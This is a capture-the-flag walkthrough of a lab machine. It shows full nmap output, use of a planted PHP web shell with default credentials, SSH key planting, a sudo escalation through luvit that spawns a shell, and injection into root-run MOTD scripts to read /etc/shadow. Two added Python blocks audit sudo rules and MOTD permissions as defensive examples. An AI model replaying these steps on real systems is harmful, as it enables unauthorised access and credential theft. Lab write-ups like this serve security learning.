NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 12:03 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating Ping Scan at 12:03
Scanning 10.10.10.181 [4 ports]
Completed Ping Scan at 12:03, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:03
Completed Parallel DNS resolution of 1 host. at 12:03, 0.57s elapsed
Initiating SYN Stealth Scan at 12:03
Scanning 10.10.10.181 [1000 ports]
Discovered open port 22/tcp on 10.10.10.181
Discovered open port 80/tcp on 10.10.10.181
Completed SYN Stealth Scan at 12:03, 3.45s elapsed (1000 total ports)
Initiating Service scan at 12:03
Scanning 2 services on 10.10.10.181
Completed Service scan at 12:03, 6.88s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.181
Retrying OS detection (try #2) against 10.10.10.181
Retrying OS detection (try #3) against 10.10.10.181
Retrying OS detection (try #4) against 10.10.10.181
Retrying OS detection (try #5) against 10.10.10.181
Initiating Traceroute at 12:03
Completed Traceroute at 12:03, 0.66s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:03
Completed Parallel DNS resolution of 2 hosts. at 12:03, 0.30s elapsed
NSE: Script scanning 10.10.10.181.
Initiating NSE at 12:03
Completed NSE at 12:04, 8.03s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 1.43s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Nmap scan report for 10.10.10.181
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/30%OT=22%CT=1%CU=38618%PV=Y%DS=2%DC=T%G=Y%TM=5ED1FE5
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 0.580 days (since Fri May 29 22:08:32 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   659.58 ms 10.10.14.1
2   659.59 ms 10.10.10.181

NSE: Script Post-scanning.
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.69 seconds
           Raw packets sent: 1141 (54.230KB) | Rcvd: 1103 (47.658KB)
WEB ENUMERATION PORT 80
Let's first check the webpage!!
Let's check its source code.
Here we see that there is something written in the comments, so let's Google that!!
After testing a bunch of these, I got one of them working: Smevk.php. Let's change the URL to request this PHP file.
The credentials are the defaults, admin and admin; we can read them in the PHP file.
After logging in I got a webpage like this!!
Looking at this page, we can read and write files on the actual machine, so let's use our own SSH keys and copy them to webadmin, as we cannot use sysadmin.
After copying our key into /home/webadmin/.ssh/authorized_keys we can SSH in as webadmin.
SSH WEBADMIN THEN SYSADMIN
As we can see, we have access to sysadmin.
After trying to get into sysadmin, I failed!!
It's time to privilege-escalate our user.
sudo -l
After searching on Google I saw that I can get access to sysadmin using simple commands, so I used a simple command to check if it works:
echo "os.execute('/bin/bash')" > privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
Here we got sysadmin's user access!!!
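The step above works because the sudo rule hands webadmin an interpreter (luvit) that runs whatever script it is given. As an added defensive example (not part of the original walkthrough), here is a small Python auditor that reads sudo -l style output and flags rules of that shape: interpreters, binaries outside the system directories, ALL, and NOPASSWD. The sample output, hostname and the interpreter list are constructed for the demo.

```python
import re
from pathlib import PurePosixPath

# Illustrative (not exhaustive) set of binaries that execute whatever script they are handed.
INTERPRETERS = {"luvit", "lua", "python", "python3", "perl", "ruby", "node", "sh", "bash"}
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")
# Matches rule lines as printed by `sudo -l`, e.g. "(sysadmin) NOPASSWD: /home/sysadmin/luvit".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_rules(sudo_l_output):
    """Return one finding per risky command a sudo rule allows."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            path = cmd.split()[0]
            reasons = []
            if path == "ALL":
                reasons.append("any command allowed")
            else:
                if PurePosixPath(path).name in INTERPRETERS:
                    reasons.append("interpreter: caller chooses the script it runs")
                if not path.startswith(SYSTEM_DIRS):
                    reasons.append("binary outside system directories")
            if reasons and nopasswd:
                reasons.append("no password required")
            if reasons:
                findings.append({"runas": runas, "command": cmd, "reasons": reasons})
    return findings

# Constructed sample in the shape of `sudo -l` output; the luvit rule mirrors the
# walkthrough's escalation, the systemctl rule is a benign control that is not flagged.
SAMPLE_SUDO_L = """\
User webadmin may run the following commands on example-host:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"({f['runas']}) {f['command']}: " + "; ".join(f["reasons"]))
```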
GETTING ROOT ACCESS
Let's run pspy32 to check the running processes.
We got a process which is unique!!
Let's Google this!!
After Googling, let's look at the file permissions and users.
root and sysadmin
It is updated every 30 seconds.
Let's put our command in 00-header, since the output of this file is shown at SSH login time (it is the SSH login banner).
echo "cat /etc/shadow" > 00-header1
We have to log in to webadmin over SSH again in another terminal.
Here we got our output!!
echo "cat /root/root.txt" > 00-header1
Here we go with our root flag!!
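The root step relies on MOTD scripts that root executes at every SSH login but that a lower-privileged user can modify or add to. As an added defensive example (not part of the original walkthrough), here is a Python check that audits such a directory: it flags scripts not owned by the expected uid, scripts or the directory itself writable by group or others, and scripts missing from or differing from a trusted baseline copy. The demo builds constructed sample directories in a temp folder; the directory layout and file contents are assumptions for the demo.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

def sha256_file(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def audit_motd_dir(motd_dir, baseline_dir, expected_uid=0):
    """(name, reasons) for scripts a non-root user could alter or that differ from baseline."""
    motd_dir, baseline_dir = Path(motd_dir), Path(baseline_dir)
    findings = []
    # A writable directory lets anyone drop a brand-new script (like 00-header1) for root to run.
    if motd_dir.stat().st_mode & WRITABLE_BY_OTHERS:
        findings.append((".", ["directory writable by group/others"]))
    for entry in sorted(motd_dir.iterdir()):
        if not entry.is_file():
            continue
        st, reasons = entry.stat(), []
        if st.st_uid != expected_uid:
            reasons.append(f"owner uid {st.st_uid} != expected {expected_uid}")
        if st.st_mode & WRITABLE_BY_OTHERS:
            reasons.append("writable by group/others")
        base = baseline_dir / entry.name
        if not base.is_file():
            reasons.append("not in baseline")
        elif sha256_file(base) != sha256_file(entry):
            reasons.append("content differs from baseline")
        if reasons:
            findings.append((entry.name, reasons))
    return findings

def demo():
    """Constructed sample: clean baseline beside a live dir with a group-writable
    00-header and an unexpected extra script 00-header1 (files owned by the current uid)."""
    with tempfile.TemporaryDirectory() as root:
        base, live = Path(root, "baseline"), Path(root, "live")
        base.mkdir()
        live.mkdir(mode=0o755)
        banner = "#!/bin/sh\necho 'Welcome'\n"
        for d, mode in ((base, 0o755), (live, 0o775)):
            (d / "00-header").write_text(banner)
            (d / "00-header").chmod(mode)
        (live / "00-header1").write_text("#!/bin/sh\necho injected\n")
        (live / "00-header1").chmod(0o755)
        return audit_motd_dir(live, base, expected_uid=os.getuid())
```

Running demo() reports 00-header as group-writable and 00-header1 as absent from the baseline; on a real host you would point audit_motd_dir at the live MOTD directory and a read-only baseline with expected_uid=0.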
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE